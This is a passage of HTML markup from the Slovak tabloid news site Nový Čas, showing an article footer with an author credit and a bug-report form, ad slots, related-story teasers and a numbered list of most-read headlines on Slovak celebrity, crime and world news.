        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-6"  href="/clanok/2534001/legendy-rockovej-sceny-po-patdesiatich-rokoch-ikonicky-zaber-v-novom-sate/" title="Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate">Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate				</a>
    		</li>        </ul>
	</div>
    <div class="cb"></div>
<div class="author-tip-error-bar">
	<div class="author">
		Autor: <span class="gray">ktt, Nový Čas</span>
	</div>
	<div class="tip">
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="lg-visible" href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
			<span class="cas-color-font font-pt-sans-bold">
				Máte tip?
			</span>
			Dajte nám vedieť
			<span class="underline">mailom</span>
			alebo na
			<span class="font-pt-sans-bold">0918 620 001</span>
		</a>
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="md-visible sm-visible" href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
			<span class="cas-color-font font-pt-sans-bold">Máte tip?</span> Dajte nám vedieť
		</a>
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="xs-visible" href="/tipredakcii/" title="Máte tip?">
			<span class="cas-color-font font-pt-sans-bold">Máte tip?</span>
		</a>
	</div>
	<div class="bug" id="bug_button">
		<a data-event="|funkcne-prvky|nahlasit-chybu" class="report-bug-open" id="report_bug_open" href="javascript:void(0)" title="Nahlásiť chybu">
			Nahlásiť chybu
		</a>
	</div>
	<div class="cb"></div>
	<div class="report-bug" id="report_bug">
        <div style="text-align:center">
            <iframe src="https://kontakt.zoznam.sk/cas/media" class="xs-hidden" width="100%" height="850"></iframe>
        </div>
        <iframe src="https://kontakt.zoznam.sk/cas/media" class="lg-hidden xs-visible" width="320" height="850"></iframe>
        <script src="https://kontakt.zoznam.sk/static/js/iframeResizer.min.js"></script>
        <script>iFrameResize({ checkOrigin: [ "https://kontakt.zoznam.sk" ] }, document.querySelector("iframe[src=\"https://kontakt.zoznam.sk/cas/media\""));</script>

        <p>
           Vami zadan&#xE9; &#xFA;daje do kontaktn&#xE9;ho formul&#xE1;ra s&#xFA; sprac&#xFA;van&#xE9; spolo&#x10D;nos&#x165;ou FPD Media, a.s., so s&#xED;dlom Prievozsk&#xE1; 14, 821 09 Bratislava, I&#x10C;O: 47 237 601, zap&#xED;san&#xE1; v Obchodnom registri Okresn&#xE9;ho s&#xFA;du Bratislava I, v odd. Sa, vlo&#x17E;ka &#x10D;. 6882/B na &#xFA;&#x10D;ely sp&#xE4;tn&#xE9;ho kontaktovania. Pre&#x10D;&#xED;tajte si viac inform&#xE1;ci&#xED; k ochrane osobn&#xFD;ch &#xFA;dajov
           <a href="https://www.cas.sk/clanok/731794/zasady/" title="Zasady ochrany udajov" target="_blank"><strong>viac inform&#xE1;ci&#xED; k ochrane osobn&#xFD;ch &#xFA;dajov</strong></a>.
        </p>
    </div>
        <script>
            $("#bug_button").click(function(){
              $("report_bug").toggle();
            });
        </script>
</div>        </div>        <div class="article-bottom-lg lg-visible mr-lg-20">
            <div class="row bordered"><div class="rs-advertisement rs-advertisement-strossle-widget">
    <!-- Reklamna plocha strossle-widget -->
    <div class="strossle-widget"></div>
</div><br>
<br>
    
    <div class="top-articles">
        <div class="top-content-big-article cloneable hidden xs-visible"
            data-clone-target="#article-top_list-content-article-0"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 hidden lg-visible md-visible sm-visible"
                id="article-top_list-content-article-1">
                <a class="article-image" href="/clanok/2533955/jedinecna-akcia-na-severe-slovenska-skvele-co-sa-podarilo-pieninskym-ornitologom/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-obrazok"
                    title="Jedinečná akcia na severe Slovenska: Skvelé, čo sa podarilo pieninským ornitológom | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321785.jpg/vtaky-odchyt-miroslav-fulin-vladimir-klc.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321785.jpg/vtaky-odchyt-miroslav-fulin-vladimir-klc.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321785.jpg/vtaky-odchyt-miroslav-fulin-vladimir-klc.jpg"
                        title="Jedinečná akcia na severe Slovenska: Skvelé, čo sa podarilo pieninským ornitológom | Nový Čas" alt=" Jedinečná akcia">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321785.jpg/vtaky-odchyt-miroslav-fulin-vladimir-klc.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2533955/jedinecna-akcia-na-severe-slovenska-skvele-co-sa-podarilo-pieninskym-ornitologom/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-nadpis"
                            title="Jedinečná akcia na severe Slovenska: Skvelé, čo sa podarilo pieninským ornitológom">
                            <span class="hidden lg-visible md-visible sm-visible">Jedinečná akcia na severe Slovenska: Skvelé, čo sa podarilo pieninským ornitológom                            </span>
                            <span class="hidden xs-visible">Jedinečná akcia: Skvelé, čo sa podarilo pieninským ornitológom                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-2">
                <a class="article-image" href="/clanok/2534001/legendy-rockovej-sceny-po-patdesiatich-rokoch-ikonicky-zaber-v-novom-sate/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-obrazok"
                    title="Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321901.jpg/elton-john-alice-cooper-paul-lynde.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321901.jpg/elton-john-alice-cooper-paul-lynde.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321901.jpg/elton-john-alice-cooper-paul-lynde.jpg"
                        title="Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate | Nový Čas" alt=" Legendy rockovej">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321901.jpg/elton-john-alice-cooper-paul-lynde.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags"><span class="flag">Foto</span>    </div>                        <a class="default-article-title" href="/clanok/2534001/legendy-rockovej-sceny-po-patdesiatich-rokoch-ikonicky-zaber-v-novom-sate/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-nadpis"
                            title="Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate">
                            <span class="hidden lg-visible md-visible sm-visible">Legendy rockovej scény po päťdesiatich rokoch: Ikonický záber v novom šate                            </span>
                            <span class="hidden xs-visible">Rovnaký žúr po 50 rokoch!                            </span>
                        </a>
                    </div>
                </div>
            </div>               <div class="sm-clear"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-3">
                <a class="article-image" href="/clanok/2534043/google-a-facebook-maju-problem-rusko-im-vyrubilo-mastne-pokuty-toto-je-dovod/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-obrazok"
                    title="Google a Facebook majú problém: Rusko im vyrubilo mastné pokuty, toto je dôvod | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3180073.jpg/typescript-photography-big-tech-people-customer-engagement-business-human-body-part-human-hand-hand-working-telephone-editorial-technology-sign-equipment-internet-social-media-wireless-technology-mobile-phone-smart-phone-device-screen-portable-information-device-logo-mobile-app-computer-software-the-media-iphone-marketing-apple-computers-thumb-computer-network-networking-icon-applying.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3180073.jpg/typescript-photography-big-tech-people-customer-engagement-business-human-body-part-human-hand-hand-working-telephone-editorial-technology-sign-equipment-internet-social-media-wireless-technology-mobile-phone-smart-phone-device-screen-portable-information-device-logo-mobile-app-computer-software-the-media-iphone-marketing-apple-computers-thumb-computer-network-networking-icon-applying.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3180073.jpg/typescript-photography-big-tech-people-customer-engagement-business-human-body-part-human-hand-hand-working-telephone-editorial-technology-sign-equipment-internet-social-media-wireless-technology-mobile-phone-smart-phone-device-screen-portable-information-device-logo-mobile-app-computer-software-the-media-iphone-marketing-apple-computers-thumb-computer-network-networking-icon-applying.jpg"
                        title="Google a Facebook majú problém: Rusko im vyrubilo mastné pokuty, toto je dôvod | Nový Čas" alt=" Google a">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3180073.jpg/typescript-photography-big-tech-people-customer-engagement-business-human-body-part-human-hand-hand-working-telephone-editorial-technology-sign-equipment-internet-social-media-wireless-technology-mobile-phone-smart-phone-device-screen-portable-information-device-logo-mobile-app-computer-software-the-media-iphone-marketing-apple-computers-thumb-computer-network-networking-icon-applying.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534043/google-a-facebook-maju-problem-rusko-im-vyrubilo-mastne-pokuty-toto-je-dovod/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-nadpis"
                            title="Google a Facebook majú problém: Rusko im vyrubilo mastné pokuty, toto je dôvod">
                            <span class="hidden lg-visible md-visible sm-visible">Google a Facebook majú problém: Rusko im vyrubilo mastné pokuty, toto je dôvod                            </span>
                            <span class="hidden xs-visible">Google a Facebook dostali od Ruska mastné pokuty                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-4">
                <a class="article-image" href="/clanok/2534041/usa-aj-europa-to-povedali-na-plne-usta-syrske-volby-nebudu-slobodne-ani-spravodlive/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-obrazok"
                    title="USA aj Európa to povedali na plné ústa: Sýrske voľby nebudú slobodné ani spravodlivé | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3322017.jpg/prezident-basar-asad-syrsky-crop.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3322017.jpg/prezident-basar-asad-syrsky-crop.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3322017.jpg/prezident-basar-asad-syrsky-crop.jpg"
                        title="USA aj Európa to povedali na plné ústa: Sýrske voľby nebudú slobodné ani spravodlivé | Nový Čas" alt=" USA aj">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3322017.jpg/prezident-basar-asad-syrsky-crop.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534041/usa-aj-europa-to-povedali-na-plne-usta-syrske-volby-nebudu-slobodne-ani-spravodlive/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-nadpis"
                            title="USA aj Európa to povedali na plné ústa: Sýrske voľby nebudú slobodné ani spravodlivé">
                            <span class="hidden lg-visible md-visible sm-visible">USA aj Európa to povedali na plné ústa: Sýrske voľby nebudú slobodné ani spravodlivé                            </span>
                            <span class="hidden xs-visible">USA a Európa: Sýrske voľby nebudú slobodné ani spravodlivé                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class="sm-clear "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-5">
                <a class="article-image" href="/clanok/2534039/biden-a-harrisova-sa-stretli-s-rodinou-georgea-floyda-nesmierne-silne-slova/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-obrazok"
                    title="Biden a Harrisová sa stretli s rodinou Georgea Floyda: Nesmierne silné slová | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3322015.jpg/george-floyd.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3322015.jpg/george-floyd.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3322015.jpg/george-floyd.jpg"
                        title="Biden a Harrisová sa stretli s rodinou Georgea Floyda: Nesmierne silné slová | Nový Čas" alt=" Biden a">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3322015.jpg/george-floyd.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags"><span class="flag">Foto</span>    </div>                        <a class="default-article-title" href="/clanok/2534039/biden-a-harrisova-sa-stretli-s-rodinou-georgea-floyda-nesmierne-silne-slova/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-nadpis"
                            title="Biden a Harrisová sa stretli s rodinou Georgea Floyda: Nesmierne silné slová">
                            <span class="hidden lg-visible md-visible sm-visible">Biden a Harrisová sa stretli s rodinou Georgea Floyda: Nesmierne silné slová                            </span>
                            <span class="hidden xs-visible"> Biden a Harrisová sa stretli s rodinou Georgea Floyda                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-6">
                <a class="article-image" href="/clanok/2534037/zmena-na-poste-ceskeho-ministra-zdravotnictva-babis-dal-ponuku-vojtechovi-pozname-odpoved/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-obrazok"
                    title="Zmena na poste českého ministra zdravotníctva: Babiš dal ponuku Vojtěchovi, poznáme odpoveď | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3254459.jpg/adam-vojtech.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3254459.jpg/adam-vojtech.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3254459.jpg/adam-vojtech.jpg"
                        title="Zmena na poste českého ministra zdravotníctva: Babiš dal ponuku Vojtěchovi, poznáme odpoveď | Nový Čas" alt=" Zmena na">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3254459.jpg/adam-vojtech.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534037/zmena-na-poste-ceskeho-ministra-zdravotnictva-babis-dal-ponuku-vojtechovi-pozname-odpoved/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-nadpis"
                            title="Zmena na poste českého ministra zdravotníctva: Babiš dal ponuku Vojtěchovi, poznáme odpoveď">
                            <span class="hidden lg-visible md-visible sm-visible">Zmena na poste českého ministra zdravotníctva: Babiš dal ponuku Vojtěchovi, poznáme odpoveď                            </span>
                            <span class="hidden xs-visible">Zmena na poste českého ministra zdravotníctva: Vojtěch prehovoril                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear"></div>
                <div class="sm-clear"></div>
                <div class="tiny-clear"></div>    </div>
<div class="rs-advertisement rs-advertisement-cas-desktop-ak-article"><!-- Reklamna plocha cas-desktop-ak-article --><div style="font-family: PT Sans Narrow,serif;font-weight: 700;font-size: 22px;color:#ed1c24 !important;text-align:left;margin-left:10px;width:100%;margin-top:20px;margin-bottom:10px;">Odpor&#xFA;&#x10D;ame z TIVI.sk</div>
<div style="max-width:100%;height:auto;position:relative;margin-left:10px"><script type="text/javascript" src="https://mr1a.exs.pl/widget/widget_playlist.php?widget=185"></script></div></div>            </div>
            <br>        </div>
    </article>
    <aside class="side-section"><div class="rs-advertisement rs-advertisement-cas-desktop-square">
    <!-- Reklamna plocha cas-desktop-square -->
    <div id='top2'>
        <script>
            googletag.cmd.push(function() { googletag.display('top2'); });
        </script>
    </div>
</div>	<div class="article-box article-box-most-read article-box-most-read-numbered switch-btn-identifier">

		<span class="subtitle cas-color-font uppercase">Najčítanejšie		</span>
			<div class="switch-btn">					<span class="switch-btn-option switch-btn-active" data-time="24h"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-24hod);">24h</span>&nbsp;/&nbsp;					<span class="switch-btn-option " data-time="3d"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-3dni);">3d</span>&nbsp;/&nbsp;					<span class="switch-btn-option " data-time="7d"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-7dni);">7d</span>			</div>			<div class="switch-content 24h">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy | Nový Čas" alt="Prečo telo"
                data-src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
            title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy</span>
        
                <span class="hidden xs-visible">Prečo telo Lučanského († 51) vybrali z hrobu?!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2533561/pribehy-obeti-padu-lanovky-trhaju-srdce-slovensky-odbornik-tusi-preco-zomrelo-tak-vela-ludi/"
                title="Príbehy obetí pádu lanovky trhajú srdce: Slovenský odborník tuší, prečo zomrelo tak veľa ľudí"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3321073.png/manzelia-deti-pad-tragedia-lanovka-zosnuli-tom-eitan-tal-peleg-amit-biran.png"
                title="Príbehy obetí pádu lanovky trhajú srdce: Slovenský odborník tuší, prečo zomrelo tak veľa ľudí | Nový Čas" alt="Príbehy obetí"
                data-src="https://img.cas.sk/cas//320px-c1/3321073.png/manzelia-deti-pad-tragedia-lanovka-zosnuli-tom-eitan-tal-peleg-amit-biran.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3321073.png/manzelia-deti-pad-tragedia-lanovka-zosnuli-tom-eitan-tal-peleg-amit-biran.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3321073.png/manzelia-deti-pad-tragedia-lanovka-zosnuli-tom-eitan-tal-peleg-amit-biran.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3321073.png/manzelia-deti-pad-tragedia-lanovka-zosnuli-tom-eitan-tal-peleg-amit-biran.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2533561/pribehy-obeti-padu-lanovky-trhaju-srdce-slovensky-odbornik-tusi-preco-zomrelo-tak-vela-ludi/"
            title="Príbehy obetí pádu lanovky trhajú srdce: Slovenský odborník tuší, prečo zomrelo tak veľa ľudí"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Príbehy obetí pádu lanovky trhajú srdce: Slovenský odborník tuší, prečo zomrelo tak veľa ľudí</span>
        
                <span class="hidden xs-visible">Príbehy obetí pádu lanovky trhajú srdce</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2533399/sona-skoncova-zverejnila-uplakanu-fotku-problem-so-syncekom-sa-opakuje-kazdy-vecer/"
                title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer | Nový Čas" alt="Soňa Skoncová"
                data-src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320599.png/syn-sona-skoncova-robko.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2533399/sona-skoncova-zverejnila-uplakanu-fotku-problem-so-syncekom-sa-opakuje-kazdy-vecer/"
            title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer</span>
        
                <span class="hidden xs-visible">Uplakaná Skoncová: Problém so synčekom sa opakuje každý večer</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2533865/slovenske-vitazstvo-neostalo-bez-odozvy-ked-uvidite-co-urobili-rusi-stupne-vam-tlak/"
                title="Slovenské víťazstvo neostalo bez odozvy: Keď uvidíte, čo urobili Rusi, stúpne vám tlak"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3321597.jpg/hokej-peter-cehlarik.jpg"
                title="Slovenské víťazstvo neostalo bez odozvy: Keď uvidíte, čo urobili Rusi, stúpne vám tlak | Nový Čas" alt="Slovenské víťazstvo"
                data-src="https://img.cas.sk/cas//320px-c1/3321597.jpg/hokej-peter-cehlarik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3321597.jpg/hokej-peter-cehlarik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3321597.jpg/hokej-peter-cehlarik.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3321597.jpg/hokej-peter-cehlarik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2533865/slovenske-vitazstvo-neostalo-bez-odozvy-ked-uvidite-co-urobili-rusi-stupne-vam-tlak/"
            title="Slovenské víťazstvo neostalo bez odozvy: Keď uvidíte, čo urobili Rusi, stúpne vám tlak"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Slovenské víťazstvo neostalo bez odozvy: Keď uvidíte, čo urobili Rusi, stúpne vám tlak</span>
        
                <span class="hidden xs-visible">Keď uvidíte, čo urobili Rusi po prehre, stúpne vám tlak</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2533013/forgac-po-stroskotani-30-rocneho-vztahu-s-manzelkou-bitka-o-velke-majetky-o-co-vsetko-moze-pri-rozvode-prist/"
                title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť? | Nový Čas" alt="Forgáč po"
                data-src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2533013/forgac-po-stroskotani-30-rocneho-vztahu-s-manzelkou-bitka-o-velke-majetky-o-co-vsetko-moze-pri-rozvode-prist/"
            title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?</span>
        
                <span class="hidden xs-visible">Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2533655/skolka-v-poprade-zverejnila-fotku-duhy-ludia-im-zacali-vypisovat-nenavistne-komentare-toto-je-na-plac/"
                title="Škôlka v Poprade zverejnila fotku dúhy: Ľudia im začali vypisovať nenávistné komentáre! TOTO je na plač"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3321197.jpg/poprad-kuriozity-skolka-duha.jpg"
                title="Škôlka v Poprade zverejnila fotku dúhy: Ľudia im začali vypisovať nenávistné komentáre! TOTO je na plač | Nový Čas" alt="Škôlka v"
                data-src="https://img.cas.sk/cas//320px-c1/3321197.jpg/poprad-kuriozity-skolka-duha.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3321197.jpg/poprad-kuriozity-skolka-duha.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3321197.jpg/poprad-kuriozity-skolka-duha.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3321197.jpg/poprad-kuriozity-skolka-duha.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2533655/skolka-v-poprade-zverejnila-fotku-duhy-ludia-im-zacali-vypisovat-nenavistne-komentare-toto-je-na-plac/"
            title="Škôlka v Poprade zverejnila fotku dúhy: Ľudia im začali vypisovať nenávistné komentáre! TOTO je na plač"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">Škôlka v Poprade zverejnila fotku dúhy: Ľudia im začali vypisovať nenávistné komentáre! TOTO je na plač</span>
        
                <span class="hidden xs-visible">Škôlka zverejnila fotku dúhy: Šialené, čo sa spustilo!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2533499/vinczeovci-neprestavaju-prekvapovat-v-ich-byte-byva-bezdomovkyna/"
                title="Vinczeovci neprestávajú prekvapovať: V ich byte býva bezdomovkyňa!"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320857.png/viktor-vincze-adela-vinczeova.png"
                title="Vinczeovci neprestávajú prekvapovať: V ich byte býva bezdomovkyňa! | Nový Čas" alt="Vinczeovci neprestávajú"
                data-src="https://img.cas.sk/cas//320px-c1/3320857.png/viktor-vincze-adela-vinczeova.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3320857.png/viktor-vincze-adela-vinczeova.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320857.png/viktor-vincze-adela-vinczeova.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320857.png/viktor-vincze-adela-vinczeova.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2533499/vinczeovci-neprestavaju-prekvapovat-v-ich-byte-byva-bezdomovkyna/"
            title="Vinczeovci neprestávajú prekvapovať: V ich byte býva bezdomovkyňa!"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Vinczeovci neprestávajú prekvapovať: V ich byte býva bezdomovkyňa!</span>
        
                <span class="hidden xs-visible">Vinczeovci prekvapujú: V ich byte býva bezdomovkyňa!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2533503/spevacka-kristina-tajila-tehotenstvo-8-mesiacov-jednu-vec-nechcu-s-manzelom-povedat-ani-po-porode/"
